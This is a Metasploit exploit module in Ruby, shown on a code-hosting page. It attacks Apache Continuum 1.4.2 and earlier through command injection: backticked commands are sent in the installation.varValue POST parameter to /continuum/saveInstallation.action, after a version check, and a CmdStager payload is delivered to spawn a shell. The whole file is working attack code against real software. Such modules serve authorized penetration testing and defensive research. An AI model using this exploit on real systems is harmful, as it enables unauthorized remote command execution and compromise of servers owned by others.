Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/http/apache_continuum_cmd_exec.rb
31310 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10
  include Msf::Exploit::CmdStager

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Apache Continuum Arbitrary Command Execution',

17
        'Description' => %q{

18
          This module exploits a command injection in Apache Continuum <= 1.4.2.

19
          By injecting a command into the installation.varValue POST parameter to

20
          /continuum/saveInstallation.action, a shell can be spawned.

21
        },

22
        'Author' => [

23
          'David Shanahan', # Proof of concept

24
          'wvu'             # Metasploit module

25
        ],

26
        'References' => [

27
          %w{CVE 2016-15057},

28
          %w{EDB 39886},

29
        ],

30
        'DisclosureDate' => '2016-04-06',

31
        'License' => MSF_LICENSE,

32
        'Platform' => 'linux',

33
        'Arch' => [ARCH_X86, ARCH_X64],

34
        'Privileged' => false,

35
        'Targets' => [

36
          ['Apache Continuum <= 1.4.2', {}]

37
        ],

38
        'DefaultTarget' => 0,

39
        'Notes' => {

40
          'Reliability' => UNKNOWN_RELIABILITY,

41
          'Stability' => UNKNOWN_STABILITY,

42
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

43
        }

44
      )

45
    )

46


47
    register_options([

48
      Opt::RPORT(8080)

49
    ])

50
  end

51


52
  def check

53
    res = send_request_cgi(

54
      'method' => 'GET',

55
      'uri' => '/continuum/about.action'

56
    )

57


58
    if res && res.body.include?('1.4.2')

59
      CheckCode::Appears

60
    elsif res && res.code == 200

61
      CheckCode::Detected

62
    else

63
      CheckCode::Safe

64
    end

65
  end

66


67
  def exploit

68
    print_status('Injecting CmdStager payload...')

69
    execute_cmdstager

70
  end

71


72
  def execute_command(cmd, opts = {})

73
    send_request_cgi(

74
      'method' => 'POST',

75
      'uri' => '/continuum/saveInstallation.action',

76
      'vars_post' => {

77
        'installation.name' => Rex::Text.rand_text_alpha(8),

78
        'installation.type' => 'jdk',

79
        'installation.varValue' => '`' + cmd + '`'

80
      }

81
    )

82
  end

83
end

84


85